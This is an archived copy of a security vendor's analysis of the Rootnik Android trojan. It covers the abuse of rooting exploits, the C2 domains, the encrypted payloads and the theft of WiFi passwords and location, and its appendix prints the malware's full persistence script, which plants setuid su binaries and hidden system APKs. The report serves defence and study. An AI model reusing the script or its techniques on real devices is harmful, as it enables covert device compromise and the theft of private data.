{
	"id": "06b2973c-a5ad-4479-a547-431219301775",
	"created_at": "2026-04-06T00:15:12.504722Z",
	"updated_at": "2026-04-10T13:12:29.968667Z",
	"deleted_at": null,
	"sha1_hash": "896b39270db2f174016be811e7d6ccfac8c7f230",
	"title": "Rootnik Android Trojan Abuses Commercial Rooting Tool and Steals Private Information",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1227103,
	"plain_text": "Rootnik Android Trojan Abuses Commercial Rooting Tool and\r\nSteals Private Information\r\nBy Wenjun Hu, Claud Xiao, Zhi Xu\r\nPublished: 2015-12-04 · Archived: 2026-04-05 22:48:08 UTC\r\nWe recently analyzed a Trojan named \"Rootnik\" which uses a customized commercial root tool named “Root\r\nAssistant” to gain root access on Android devices. By reverse engineering and repackaging this tool, the creators\r\nof Rootnik successfully stole at least five exploits that give them root access to Android devices that are running\r\nAndroid 4.3 and earlier. Root Assistant was developed by a Chinese company to help individuals gain root access\r\nto their own devices. However, Rootnik uses this tool to attack phones all over the world. Based on the data we\r\nhave collected, Android users in the United States, Malaysia, Thailand, Lebanon and Taiwan have been affected by\r\nthe Trojan thus far.\r\nRootnik was able to spread by being embedded in copies of legitimate applications:\r\nWiFi Analyzer\r\nOpen Camera\r\nInfinite Loop\r\nHD Camera\r\nWindows Solitaire\r\nZUI Locker\r\nFree Internet Austria\r\nSo far, we have observed more than 600 samples of Rootnik in the wild.\r\nAfter a deep analysis of the malware, we determined that it’s able to perform the following actions.\r\nAbuse a customized version of “Root Assistant” to exploit Android vulnerabilities including CVE-2012-4221,\r\nCVE-2013-2596, CVE-2013-2597, CVE-2013-6282.\r\nInstall several APK files on the system partition of the compromised device to maintain persistence after\r\nsuccessfully gaining root access.\r\nInstall and uninstall both non-system and system apps without users’ awareness.\r\nDownload executable files from remote servers for local execution.\r\nAggressively promote other applications. 
The app promotion advertisements are displayed to the user\r\nregardless of the current activity and even pop up in full screen mode when the user is viewing their home\r\nscreen.\r\nSteal WiFi information including passwords and keys as well as SSID and BSSID identifiers.\r\nHarvest victims’ private information including their location, phone MAC address and device ID.\r\nRootnik connects to remote servers using the following domain names.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 1 of 16\n\napplight[.]mobi\r\njaxfire[.]mobi\r\nsuperflashlight[.]mobi\r\nshenmeapp[.]info\r\nThe earliest creation time of these domains dates back to February 2015. At the time of this publication, all of these\r\nremote servers are active. Additional indicators related to this attack are available in the appendix.\r\nHow Rootnik Works\r\nThe Rootnik Malware Workflow\r\nAs shown in Figure 1, Rootnik distributes itself by repackaging and injecting malicious code into legitimate\r\nAndroid apps. After it is installed on an Android device, Rootnik launches a new thread to gain root privileges if\r\ncertain conditions are met. Meanwhile, it begins an “app promotion” procedure that displays advertisements for\r\nother apps to the user. To gain root access, Rootnik first downloads encrypted payloads from a remote server if\r\nthey do not exist locally, then proceeds to attempt exploitation of one of four vulnerabilities. After achieving root\r\naccess successfully, the malware writes four APK files to the system partition and reboots the compromised\r\ndevice.\r\nFigure 1: An overview of Rootnik’s workflow\r\nThese four APK files serve as system apps after rebooting, and primarily fall into three categories based on their\r\nfunctionality. 
Based on the samples we have collected so far, the file names of these four APKs are static.\r\nAndroidSettings.apk\r\nBluetoothProviders.apk\r\nWifiProviders.apk\r\nVirusSecurityHunter.apk\r\nAndroidSettings.apk is responsible for promoting Android apps and has similar logic to the host malware’s app\r\npromotion procedure. BluetoothProviders.apk and WifiProviders.apk perform identical tasks: they act as a\r\nremote control component that can install and uninstall apps as well as download and execute new code from\r\nremote servers.\r\nVirusSecurityHunter.apk is purely a private data-harvesting component, which can steal WiFi information, a\r\nvictim’s location and other potentially sensitive data.\r\nRoot Payload Preparation\r\nIf an infected device is running Android version 4.4 or earlier, and this device isn’t located in certain countries\r\nspecified in the AndroidManifest.xml file, Rootnik will attempt to gain root privileges. Thus far, all samples we\r\nanalyzed were configured to attempt to gain root access in all locations except inside China. This is noteworthy as\r\nthe root utility this malware has co-opted is developed in China.\r\nBefore beginning the rooting process, Rootnik prepares the payloads for execution. It first looks for an asset\r\nnamed “res.bin”, and if this asset does not exist it will access the following remote location:\r\nhttp[:]//api.jaxfire[.]mobi/app/getTabsResBin\r\nThis URL is Base64 encoded in the Rootnik code. The remote server returns a response that is encrypted using\r\nAES/CBC/PKCS5Padding. Decrypting the response results in the following URL:\r\nhttp[:]//cdn.applight[.]mobi/applight/2015/1442824462res.bin\r\nRootnik then downloads this file from the decrypted URL using an HTTP GET request. 
The res.bin is actually a\r\nZIP archive that is encrypted with DES using the key “#xaj\u0026kl+”. Once decrypted, the following files are\r\nextracted from the archive.\r\nbusybox\r\npsneuter.script_bak\r\ninstall-recovery.sh\r\nsu\r\nrealroot, newrealroot, miroot, onekeyroot\r\nlog_sdk.dex\r\nThe log_sdk.dex is an encrypted DEX file that is decrypted, renamed to a.dex and temporarily stored under the\r\napp’s own data directory. This a.dex file is then dynamically loaded into the app process. The optimization\r\ndirectory for a.dex during dynamic loading is set to a hidden folder named .opt_log, and the a.dex file is finally\r\ndeleted as soon as dynamic loading finishes. This entire process is completed using native code in the library\r\nlibabm.so.\r\nAfter investigating the a.dex file, we found it’s actually a customized version of the original commercial root\r\nutility named “Root Assistant,” developed in China.\r\nCustomizing a Commercial Root Utility\r\nThe original “Root Assistant” provides a “one-click root” functionality by exploiting vulnerabilities in the Android\r\nsystem, and “can support the most number of devices with the highest successful rooting rate” according to the\r\nofficial website. “One-key root” means the user can get root access by clicking a single key. The latest version of\r\nthe utility, 1.5.1, uses a commercial packer to protect itself from reverse-engineering. However, we have located\r\nearlier versions of this utility that only used basic obfuscation techniques, which are simple to reverse engineer.\r\nThe earlier version (1.3.0) of this utility follows this basic procedure to gain root privileges:\r\n(1). Report Device Specific Information\r\n“Root Assistant” first sends device specific information to its remote server. 
After receiving this information, the\r\nremote server returns data guiding the selection of proper root exploits. It is important to note that there is no\r\naccess authentication during this network connection.\r\n(2). Prepare Root Exploits\r\nThe root utility stores all of the root exploits in local storage and will choose exploits according to the guidance\r\nfrom its remote server. These root exploits are embedded into four executable files, which are named realroot,\r\nnewrealroot, miroot and onekeyroot. After investigating these executable files, we found that some exploit\r\nmethods come from open source projects including android-rooting-tools, libmsm_acdb_exploit and\r\nlibfj_hdcp_exploit. Table 1 shows some of the vulnerabilities exploited by this root tool.\r\nID Exploit Method CVE ID\r\n1 sock_diag CVE-2012-4221\r\n2 fb_mem CVE-2013-2596\r\n3 msm_acdb CVE-2013-2597\r\n4 put_user CVE-2013-6282\r\n5 fj_hdcp N/A\r\nTable 1: Root exploits used by “Root Assistant”\r\n(3). Apply Exploits\r\nAll four of the files mentioned above are ELF executables and are invoked directly through shell commands. It’s\r\nimportant to note that a magic string is required when running these executables, otherwise they will refuse to\r\nexploit the device. For example, to run the executable onekeyroot, the magic string “www_onekeyrom_com”\r\nshould be provided, as shown in Figure 2. This can be considered a type of self-protection to prevent third parties\r\nfrom co-opting executables for their own use.\r\nFigure 2: A magic string is required when executing onekeyroot\r\n(4). Post Process\r\nAfter gaining root access successfully, one of the scripts named psneuter.script or onekeyrootseckill.sh (depending\r\non which file is executed to gain root access) is executed with super user privilege. 
The main purpose of these\r\nscripts is to install a root privilege management application and to copy a modified “su” file to the system\r\npartition.\r\nAs demonstrated above, “Root Assistant” in version 1.3.0 can be easily reverse-engineered, introducing security\r\nconcerns which are detailed below:\r\nAs the tool is made up of multiple individual components that each perform a specific task without any\r\nuser interaction, they could be easily extracted and re-used by an attacker.\r\nNo authentication is required during the network connection between clients and the remote server, which\r\nmeans an attacker who re-uses this code can also re-use the Root Assistant server to help identify the best\r\nexploits for a device.\r\nRoot exploits are stored locally without any protection. Although magic strings are required to run the\r\nrooting executables, this scheme is not effective when the whole app can be reverse-engineered.\r\nThese security holes made it possible for “Root Assistant” to be co-opted by the Rootnik malware. The attacker\r\nrepackaged this root utility to generate a dex file, which is dynamically loaded during the attack to achieve root\r\naccess.\r\nFigure 3 shows the class structures of this root utility and Rootnik’s a.dex file. Comparing them shows us that\r\nthe primary difference between them is Rootnik’s class android.core.utils.RootUtil. In this class, a thread named\r\nRootAThread is started to launch a root-gaining procedure by invoking the “rooting” entry point in the original\r\nutility.\r\nAs described above, psneuter.script or onekeyrootseckill.sh are executed once root privileges are acquired.\r\nRootnik customized this root utility to always execute psneuter.script and also modified this script file by adding\r\nseveral shell commands to maintain persistent execution on the device. Figure 4 depicts parts of those added shell\r\ncommands, which show that four APK files are written to the /system/app directory. 
The whole\r\ncontent of psneuter.script is included in the appendix.\r\nFigure 3: Class structures of “Root Assistant” (v1.3.0, left) and a.dex (right)\r\nFigure 4: Shell commands writing APK files to the system partition\r\nEach of these APK files is named to look like a system application. Finally, Rootnik reboots the compromised\r\ndevice and the new APK files are installed as system applications. To avoid being noticed by ordinary users, these\r\nfour apps have no icons on a victim’s device after being installed.\r\nApp Promotion\r\nIn addition to gaining root privileges on the device, Rootnik promotes apps to generate revenue for its creator. As\r\ndepicted in Figure 1, the AndroidSettings.apk file, which is installed on the device, has similar app promotion\r\nfunctionality to the host sample. To avoid detection, all of the individual parts of the app promotion logic are\r\nimplemented through a delegate that is dynamically loaded from an encrypted JAR file.\r\nInformation about which apps to promote is downloaded from the following URL every 15 minutes.\r\nhttp[:]//cs.applight[.]mobi/c2s\r\nFigure 5 shows the network traffic between a Rootnik sample and the remote server. The information retrieved\r\nfrom the server is stored in a local database named com_av_ad.db as shown in Figure 6. It appears Rootnik\r\nchooses different apps to promote based on the infected device’s geographic location. 
It’s noteworthy that the\r\nlocal database includes a column named pay_out, which appears to list the amount of revenue for each app\r\ninstallation.\r\nFigure 5: Network traffic between Rootnik and the remote server\r\nFigure 6: Promoted apps’ information stored in a local database\r\nRootnik’s app promotion is especially aggressive and annoying to users. Advertisements pop up periodically\r\nregardless of current activity and are even shown in full screen mode. If a victim clicks one of those\r\nadvertisements, Rootnik will launch the Google Play app and show the promoted app’s page (Figure 7).\r\nFigure 7: App on Google Play shown when an advertisement is clicked\r\nRemote Control\r\nBluetoothProviders.apk and WifiProviders.apk have identical functionality and serve as a remote control\r\ncomponent. Network data transferred between the remote control component and the remote server is encrypted\r\nusing AES/CBC/PKCS5Padding, and the remote servers validate incoming connections by checking values\r\nembedded in the HTTP headers. To increase the robustness of the remote control channel, Rootnik uses two more\r\ndomains to identify the command and control server, api.applight[.]mobi and api.superflashlight[.]mobi, in\r\naddition to the already mentioned api.jaxfire[.]mobi.\r\nThe remote control component is capable of performing multiple malicious functions, including but not limited to\r\nthe following:\r\n(1). Silent Application Installation\r\nWith root privileges, the malware can install both non-system and system apps without alerting the user. As shown\r\nin Figure 8, Rootnik retrieves information about new apps to install from a remote server. 
After decrypting data\r\nfrom the server we can see that it includes all of the information required to retrieve and install the new app, as\r\ndepicted in Figure 9.\r\nTo install a new app, Rootnik makes an HTTP request to the URL listed in the “parameter” value as shown in\r\nFigure 9, and installs the downloaded result as a non-system or system app, based on the value in the “action” field\r\nof the response data. There are two possible “action” values:\r\nlibrary.root.action.install_app_ex: install a non-system app\r\nlibrary.root.action.install_app_system: install a system app\r\nRootnik uses the pm utility of the Android system to install non-system apps, while it writes APK files into the\r\n/system/app directory to install system apps as shown in Figure 10. After installing an app successfully, the “shell”\r\nvalue in the response data will be executed as a command. For example, the “shell” value shown in Figure 9 will\r\nresult in the new app starting its main activity using the “am” utility of the Android system.\r\nFigure 8: Network traffic when fetching information about new apps to install\r\nFigure 9: A section of the decrypted information from the remote server\r\nFigure 10: Command used to install system applications\r\n(2). Silently Uninstall Applications\r\nIn addition to installing apps, the remote control component is also capable of silently uninstalling apps. During\r\nthe app installation procedure described above, an installed app’s package name is stored in a shared preference\r\nfile named uninstall_set.xml. These package names are later used as parameters to uninstall specific apps. 
Rootnik\r\nexecutes the “pm uninstall” command to uninstall non-system apps, while it invokes the “pm disable” command\r\nand then removes the corresponding APK files from the /system/app directory to uninstall system apps (Figure\r\n11).\r\nFigure 11: Command used to uninstall system apps\r\n(3). Download and Execute DEX Files\r\nRootnik was developed to be highly flexible, as it can also download and execute dex files from remote servers.\r\nDescriptions of the dex files to be executed are first fetched from remote servers, and the resulting data contains\r\ndownload URLs for the dex files as well as the class names that should be invoked within them. After retrieving\r\nthe descriptive information, Rootnik downloads the dex files from the specified URLs and validates their CRC32\r\nvalues. All downloaded dex files are encrypted using DES and their decryption keys are specified in the response\r\ndata. After decrypting the dex files they are dynamically loaded and a method named doInBackground is invoked\r\nas shown in Figure 12.\r\nFigure 12: Executing a dex file downloaded from the remote server\r\nIn addition to the behaviors described above, this remote control component also has the ability to self-update\r\nand upload information about installed applications to the C2 server.\r\nPrivate Data Theft\r\nVirusSecurityHunter.apk, judging by its filename, appears to be an antivirus app but in reality has nothing to\r\ndo with antivirus. This component actually harvests WiFi passwords, device location information, the device\r\nMAC address and other private information before sending it to a C2 server using the domain\r\napi.shenmeapp[.]info.\r\nThis component implements a service named mobi.hteam.hunter.service.HunterService, which is mainly in\r\ncharge of harvesting WiFi information. 
After investigating this service, we found that WiFi information is\r\ncollected in two different ways. One is to use APIs in the WifiManager class provided by the Android system.\r\nRootnik first invokes the startScan method to scan for WiFi access points, then it extracts BSSID (address of the\r\naccess point), SSID (network name) and encryption scheme data from the scan results and stores them in a local\r\ndatabase.\r\nThe component also parses the contents of the file located at /data/misc/wifi/wpa_supplicant.conf, which stores\r\ninformation about all of the WiFi access points that a device has ever connected to. This file is owned by the\r\nsystem user, and can’t normally be read by non-system applications. This is not a problem for Rootnik, as it has\r\nalready gained root privileges at this point in execution. Figure 13 shows some contents of a wpa_supplicant.conf\r\nfile from a Nexus 7 device running Android 4.3. Note that the psk value holds the password used to access the\r\nWiFi network listed. Information including the SSID, BSSID, psk and key_mgmt values is extracted from this\r\nfile and stored in a local database.\r\nFigure 13: A part of a wpa_supplicant.conf file on a Nexus 7 device running Android 4.3\r\nAnother service in the information collection component named org.myteam.analyticssdk.AnalyticsIntentService\r\nis responsible for uploading information including the victim’s location, device MAC address and device ID to the C2\r\nserver every 24 hours (Figure 14).\r\nFigure 14: Uploading private information\r\nProtection and Prevention\r\nRootnik customizes an earlier version of a commercial root utility named “Root Assistant” from China, and is\r\ncapable of gaining root privileges on devices running Android OS prior to version 4.4. 
We strongly suggest to\r\nusers who want to mitigate the threat from Rootnik and similar malware to keep their Android devices updated to\r\navoid being vulnerable to known exploits. Users should also avoid installing applications from unknown sources.\r\nhttps://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/\r\nPage 11 of 16\n\nPalo Alto Networks provide comprehensive protections against Rootnik through our platform. Our WildFire\r\nservice is able to identify samples of this malware family and we have created the Rootnik tag for AutoFocus\r\nusers to identify these files. We have also released DNS signatures to detect and block all malicious network\r\ntraffic related to Rootnik.\r\nAppendix\r\nPsneuter.script Contents\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n#!/system/bin/sh\r\nPKG_NAME=net.boy.threewTeB94\r\nmount -o rw,remount /system\r\n/data/data/$PKG_NAME/files/busybox mount -o rw,remount /system\r\n/system/bin/stop nac_server\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/app/Superuser.apk\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox rm -r -f /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lb.res \u003e\r\n/system/app/BluetoothProviders.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lw.res \u003e\r\n/system/app/WifiProviders.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/lgs.res \u003e\r\n/system/app/AndroidSettings.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/vsh.res \u003e\r\n/system/app/VirusSecurityHunter.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/BluetoothProviders.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 
/system/app/WifiProviders.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/AndroidSettings.apk\r\n/data/data/$PKG_NAME/files/busybox chmod 0644 /system/app/VirusSecurityHunter.apk\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/su \u003e /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/assets/inputbox \u003e /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/assets/outputbox \u003e /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox touch -r /system/bin/am /system/bin/inputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox touch -r /system/bin/am /system/bin/outputbox\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/su\r\n/data/data/$PKG_NAME/files/busybox cat /system/bin/su \u003e /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/su\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e /system/xbin/daemonsu\r\n/data/data/$PKG_NAME/files/busybox cat /system/xbin/su \u003e 
/system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/xbin/ku.sud\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/install-recovery.sh \u003e /system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/etc/install-recovery.sh\r\n/data/data/$PKG_NAME/files/busybox cat /data/data/$PKG_NAME/files/99SuperSUDaemon \u003e /system/etc/init.d/99SuperSUDaemon\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/etc/init.d/99SuperSUDaemon\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/etc/init.d/99SuperSUDaemon\r\n/data/data/$PKG_NAME/files/busybox cat /system/bin/su \u003e /system/bin/.apkolr\r\n/data/data/$PKG_NAME/files/busybox chown 0.0 /system/bin/.apkolr\r\n/data/data/$PKG_NAME/files/busybox chmod 6755 /system/bin/.apkolr\r\nmount -o ro,remount /system\r\n/data/data/$PKG_NAME/files/busybox mount -o ro,remount /system\r\necho \"Now, script finish!\"\r\nRootnik Samples\r\nAdditional APK files written to system partition by Rootnik\r\nSource: https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/"
	],
	"report_names": [
		"rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information"
	],
	"threat_actors": [],
	"ts_created_at": 1775434512,
	"ts_updated_at": 1775826749,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.pdf",
		"text": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.txt",
		"img": "https://archive.orkl.eu/896b39270db2f174016be811e7d6ccfac8c7f230.jpg"
	}
}